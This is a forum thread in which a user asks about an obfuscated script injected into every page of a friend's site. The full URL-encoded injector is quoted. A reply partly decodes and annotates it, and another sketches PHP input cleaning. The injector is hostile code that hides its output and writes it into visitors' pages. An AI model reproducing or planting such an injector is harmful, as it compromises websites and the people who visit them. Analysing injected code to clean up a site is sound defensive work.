



    • CommentAuthoraconnor
    • CommentTimeSep 25th 2007
    Recently, the script below started appearing on all of the pages on a friend's new site. Has anyone ever seen this before? Anyone know what it does?


    <!-- NOTE(review): this is the injected sample under discussion, not site code. document.write(unescape(...)) expands the URL-encoded string into a second <script> that looks up each two-letter token of Ko in the yj alphabet, takes the matching entry of uL, XORs it with 217, and document.write()s the rebuilt string; a try/catch with an empty handler swallows any error, and eoY appears to act as a run-once flag. To see what it actually writes, decode offline with a URL-decoder that keeps a literal '+' as '+' (the loops depend on `+=` and `++`). -->
    <!--[z0s]--><script>document.write(unescape("%3Cscript%3Eif%28eoY%21%3D1%29%7Bfunction%20UB%28DE%29%7Breturn%20DE%7Dtry%7Bvar%20yj%3D%27JJ0J50Jp0JZ0JK0J30JG0Jz0JC0JM0J60JW0JL0Jd0Jy0J40Jw0Jj0J70Jk0Jo0Jg0Ji0Jh0Jx0JU0JH0Js0Jf0Jl0Jq0JF0JB0JT0JA0JV0JN0JY0Jm0JD0Je0Jc0Ja0JP0Jn0Jt0JS0JO0Jr0JR0JI0Jb0J90J805J05505p05Z05K05305G05z05C05M05605W05L05d05y05405w05j05705k05o05g05i05h%27%3Bvar%20PC%3Dyj.substr%282%2C1%29%2CuL%3DArray%2825624%5E25853%2C23853%5E23943%2C15823%5E15733%2CgZ%28%27171%27%29%2CgZ%28%27176%27%29%2C3568%5E3417%2CgZ%28%27173%27%29%2CgZ%28%27231%27%29%2C19220%5E19371%2CgZ%28%27172%27%29%2CgZ%28%27183%27%29%2CgZ%28%27182%27%29%2CgZ%28%27249%27%29%2CgZ%28%27157%27%29%2CgZ%28%27128%27%29%2CgZ%28%27241%27%29%2CgZ%28%27158%27%29%2C12032%5E12221%2C26173%5E26281%2C21122%5E21111%2CgZ%28%27187%27%29%2CgZ%28%27184%27%29%2C20979%5E20847%2CgZ%28%27240%27%29%2C7365%5E7271%2CgZ%28%27175%27%29%2CgZ%28%27138%27%29%2C26976%5E27135%2C14673%5E14773%2CgZ%28%27188%27%29%2CgZ%28%27174%27%29%2CgZ%28%27154%27%29%2C1413%5E1335%2CgZ%28%27226%27%29%2C26492%5E26507%2CgZ%28%27141%27%29%2C975%5E891%2C13903%5E14065%2C11559%5E11733%2CgZ%28%27225%27%29%2CgZ%28%27239%27%29%2C12466%5E12383%2C27508%5E27549%2C21014%5E21229%2C4746%5E4651%2CgZ%28%27164%27%29%2C12571%5E12685%2C26439%5E26553%2C17667%5E17899%2CgZ%28%27137%27%29%2C21685%5E21565%2C28866%5E28791%2C17621%5E17533%2C1243%5E1099%2C2665%5E2719%2C4868%5E5045%2C19225%5E19437%2CgZ%28%27227%27%29%2CgZ%28%27248%27%29%2CgZ%28%27230%27%29%2CgZ%28%27139%27%29%2C26831%5E26701%2CgZ%28%27135%27%29%2C9248%5E9347%2CgZ%28%27224%27%29%2C5433%5E5565%2CgZ%28%27133%27%29%2C6635%5E6515%2C27917%5E28135%2CgZ%28%27155%27%29%2C27399%5E27559%2C588%5E671%2CgZ%28%27235%27%29%2CgZ%28%27131%27%29%2C28727%5E28891%2CgZ%28%27238%27%29%2C6268%5E6381%2C20440%5E20267%29%3Bvar%20Ou%2Ctm%3Bvar%20gV%2CKo%3D%27JJJ5JpJZJKJ3JGJzJCJMJ6JpJGJKJWJ6JLJ3JdJyJ4JwJjJ7JkJoJgJiJhJxJLJUJgJZJLJHJwJsJfJ6JlJqJLJdJgJGJlJ4JhJkJLJFJBJwJfJLJ6JlJqJLJdJgJGJlJ4JhJTJLJFJBJwJAJ5JlJGJVJKJNJlJ4JHJwJsJAJY
JlJGJVJKJNJlJ4JhJmJDJeJcJaJaJaJaJaJhJTJLJjJWJpJMJNJlJ6JGJAJpJWJWJBJKJlJLJfJLJwJjJ7JmJPJfJPJmJlJ5JpJgJ3JlJ4JoJgJiJhJmJPJTJlJnJ3JKJZJlJ5JfJPJmJFJBJwJAJGJWJwJ7JVJHJGJZJKJ6JYJ4JhJTJLJtJUJgJZJLJnJSJsJfJOJ5JrJCJjJRJnJOJTJUJgJZJLJqJsJZJfJOJrJOJkJIJiJgJfJOJMJ3JjJgJGJlJrJAJpJbJgJ5J5JKJpJGJlJbJAJWJZJYJOJTJUJgJZJLJ9JIJ8JfJO5J55JGJNJb5JJOJTJKJCJ4JjJWJpJMJNJlJ6JGJAJpJWJWJBJKJlJAJKJ6JjJlJnJSJCJ4JnJSJsJmJOJfJOJmJqJsJZJhJLJfJf5pJrJhJxJUJgJZJLJjJb55JfJjJWJpJMJNJlJ6JGJAJbJWJpJgJGJKJWJ6JA55JWJ5JGJTJUJgJZJLJ9Jl55JfJLJO55JGJOJmJOJGJ35ZJOJmJO5J5JJOJmJ4JLJjJb55JL5KJfJLJOJO53JOJO5Z5GJMJyJ4JhJhJLJmJLJjJb55JAJZJlJ3JbJgJpJlJLJ45J5z5CJg5p5MJa5p56JA5p5W5JJkJOJAJOJhJAJZJlJ3JbJgJpJlJLJ45J5LJAJm5JJkJOJAJOJhJmJOJAJOJm5GJMJyJ4JhJLJmJOJAJOJLJmJLJIJiJgJmJ9JIJ8JTJUJgJZJL5MJpJdJfJjJWJpJMJNJlJ6JGJAJpJZJlJgJGJlJiJbJlJNJlJ6JGJ4JOJKJCJZJgJNJlJOJhJT5MJpJdJAJ5JlJG5dJGJGJZJKJoJMJGJlJLJ4JOJ5JZJpJOJkJLJ9Jl55JhJT5MJpJdJA55JlJKJY55JGJfJcJT5MJpJdJAJqJKJjJG55Jf5yJT5MJpJdJAJCJZJgJNJl54JWJZJjJlJZJLJfJLJaJTJLJGJZ5wJxJLJjJWJpJMJNJlJ6JGJAJoJWJj5wJAJgJ3J3JlJ6JjJF55JKJbJjJLJ4JL5MJpJdJhJTJLJ3JdJyJ4JnJSJsJkJLJqJsJZJLJhJTJtJLJpJgJGJp55J4JlJhJLJxJjJWJpJMJNJlJ6JGJAJqJZJKJGJlJLJ4JOJJ55JGJNJbJzJJJoJWJj5wJzJJ5JJoJWJj5wJzJJ5J55JGJNJbJzJOJhJTJLJjJWJpJMJNJlJ6JGJAJoJWJj5wJAJgJ3J3JlJ6JjJF55JKJbJjJLJ4JL5MJpJdJhJTJ3JdJyJLJ4JLJnJSJsJkJqJsJZJhJLJTJtJLJt5jJCJMJ6JpJGJKJWJ6JL5GJMJyJ4JhJxJLJUJgJZJLJSJpJHJf57JcJTJUJgJZJLJWJY5kJfJPJaJr575yJc5oJe5gJD56JaJgJoJpJjJlJCJPJkJY5iJNJfJPJPJTJLJCJWJZJ4JsJw54JfJaJTJLJsJw54JLJJJLJSJpJHJTJLJsJw54JmJmJhJLJY5iJNJmJfJLJWJY5kJAJ5JMJoJ5JGJZJ4J7JgJG55JAJCJbJWJWJZJ4J7JgJG55JAJZJgJ6JjJWJNJ4Jh5hJWJY5kJAJbJlJ6JYJG55JhJkJrJkJrJhJTJLJZJlJGJMJZJ6JLJY5iJNJTJLJtJJ5JJ5JpJZJKJ3JGJz%27%3Bvar%20sO%3DString%28%29%3Bfunction%20gZ%28Nt%29%7Breturn%20parseInt%28Nt%29%7Dyj%3Dyj.split%28PC%29%3Bfor%20%28Ou%3D0%3BOu%3CKo.length%3BOu+%3D2%29%7BgV%3DKo.substr%28Ou%2C2%29%3Bfor%28tm%3D0%3Btm%3Cyj.length%3Btm++%29%7Bif%28yj%5Btm%5D%3D%3DgV%29break%3B%7DsO+%3DString.fromCharCode%28uL%5Btm%5D%5E217%29%3B%7Ddocument.write%28sO%29%3B%7Dcatch
%28GYM%29%7B%7D%7Dvar%20eoY%3D1%3C/script%3E"))</script><!--[/z0s]-->


    Also, can anyone recommend any tools for checking whether a form is vulnerable to SQL injection or cross-site scripting?

    Thanks.
    • CommentAuthorMatt
    • CommentTimeSep 25th 2007 edited

    // Decoded form of the injected payload quoted above. Read it as a sample
    // under analysis: this forum copy is NOT functional as pasted (see the
    // transcription note on the loops) and the Ko literal was stripped.
    // eoY is a hoisted var, undefined on first run, so this guard passes once;
    // it is set to 1 at the bottom, which looks like a run-once flag.
    if(eoY != 1) {
    // Identity function that nothing in this listing calls — presumably filler.
    function UB(DE) {
    return DE}
    try {
    // yj: alphabet of two-character tokens separated by '0'. PC picks that
    // separator out of position 2, and yj is later split on it.
    var yj = 'JJ0J50Jp0JZ0JK0J30JG0Jz0JC0JM0J60JW0JL0Jd0Jy0J40Jw0Jj0J70Jk0Jo0Jg0Ji0Jh0Jx0JU0JH0Js0Jf0Jl0Jq0JF0JB0JT0JA0JV0JN0JY0Jm0JD0Je0Jc0Ja0JP0Jn0Jt0JS0JO0Jr0JR0JI0Jb0J90J805J05505p05Z05K05305G05z05C05M05605W05L05d05y05405w05j05705k05o05g05i05h';
    // uL: table of byte values, each disguised as either an XOR of two
    // constants or a parseInt() call through gZ(). Entry i pairs with token i
    // of the yj alphabet.
    var PC = yj.substr(2, 1), uL = Array(25624^25853, 23853^23943, 15823^15733, gZ('171'), gZ('176'), 3568^3417, gZ('173'), gZ('231'), 19220^19371, gZ('172'), gZ('183'), gZ('182'), gZ('249'), gZ('157'), gZ('128'), gZ('241'), gZ('158'), 12032^12221, 26173^26281, 21122^21111, gZ('187'), gZ('184'), 20979^20847, gZ('240'), 7365^7271, gZ('175'), gZ('138'), 26976^27135, 14673^14773, gZ('188'), gZ('174'), gZ('154'), 1413^1335, gZ('226'), 26492^26507, gZ('141'), 975^891, 13903^14065, 11559^11733, gZ('225'), gZ('239'), 12466^12383, 27508^27549, 21014^21229, 4746^4651, gZ('164'), 12571^12685, 26439^26553, 17667^17899, gZ('137'), 21685^21565, 28866^28791, 17621^17533, 1243^1099, 2665^2719, 4868^5045, 19225^19437, gZ('227'), gZ('248'), gZ('230'), gZ('139'), 26831^26701, gZ('135'), 9248^9347, gZ('224'), 5433^5565, gZ('133'), 6635^6515, 27917^28135, gZ('155'), 27399^27559, 588^671, gZ('235'), gZ('131'), 28727^28891, gZ('238'), 6268^6381, 20440^20267);
    var Ou, tm;
    // Ko: the message as a run of two-character tokens. The literal was
    // stripped from this copy; the full value is in the URL-encoded original above.
    var gV, Ko = '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';
    var sO = String();
    function gZ(Nt) {
    return parseInt(Nt)}
    yj = yj.split(PC);
    // Transcription note: the encoded original reads `Ou+=2`, `tm++` and
    // `sO+=`; the '+' characters were most likely dropped by a URL-decoder that
    // maps '+' to a space. As pasted, Ou sticks at 2 and tm never increments,
    // so this copy would spin rather than run.
    for (Ou = 0; Ou < Ko.length; Ou = 2) {
    gV = Ko.substr(Ou, 2);
    // Find the token's index in the alphabet; that index selects the byte in uL.
    for(tm = 0; tm < yj.length; tm ) {
    if(yj[tm] == gV)break;
    }
    // XOR 217 undoes the per-byte masking (the original appends each char).
    sO = String.fromCharCode(uL[tm]^217);
    }
    // The rebuilt string is written into the page as markup.
    document.write(sO);
    }
    // Any error is swallowed, so a failure leaves no visible trace.
    catch(GYM) {
    }
    }
    var eoY = 1


    I am thinking there is more to it than just that to make the function work. I am not sure exactly what it does, to be honest.
    • CommentAuthorPettyRider
    • CommentTimeSep 25th 2007 edited
    I think you would just need to inspect the code that receives the form input to know. Typically, you filter all incoming content at some point in your scripts' processing:

    // Sketch from the post: visit every submitted field, clean it, and write
    // the result back so later code only ever sees the cleaned $_POST.
    // NOTE(review): blanket input "cleaning" is lossy and context-blind; the
    // robust defence is to encode at the point of use (prepared statements
    // for SQL, htmlspecialchars() for HTML output).
    foreach (array_keys($_POST) as $field) {
        $dirty = $_POST[$field];
        // Run routines to clean $dirty here (left as a placeholder in the post)
        $_POST[$field] = $dirty;
    }

    or, perhaps more efficiently, clean only what is needed:

    // Fetch only the field that is actually used, via the helper defined next.
    $username = clean_post('username');

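    /**
     * Fetch one field from $_POST and run it through the cleaning step.
     *
     * @param string $key  Name of the submitted field.
     * @return mixed|null  The (cleaned) value, or null when the field was not submitted.
     */
    function clean_post($key) {
        // Guard the lookup so an absent field returns null without raising an
        // undefined-index notice (the unguarded read also yielded null, plus the notice).
        if (!array_key_exists($key, $_POST)) {
            return null;
        }
        $item = $_POST[$key];
        // Clean $item here (placeholder in the original post).
        // NOTE(review): the cleaning that matters depends on where $item ends up:
        // prepared statements for SQL, htmlspecialchars() for HTML output.
        return $item;
    }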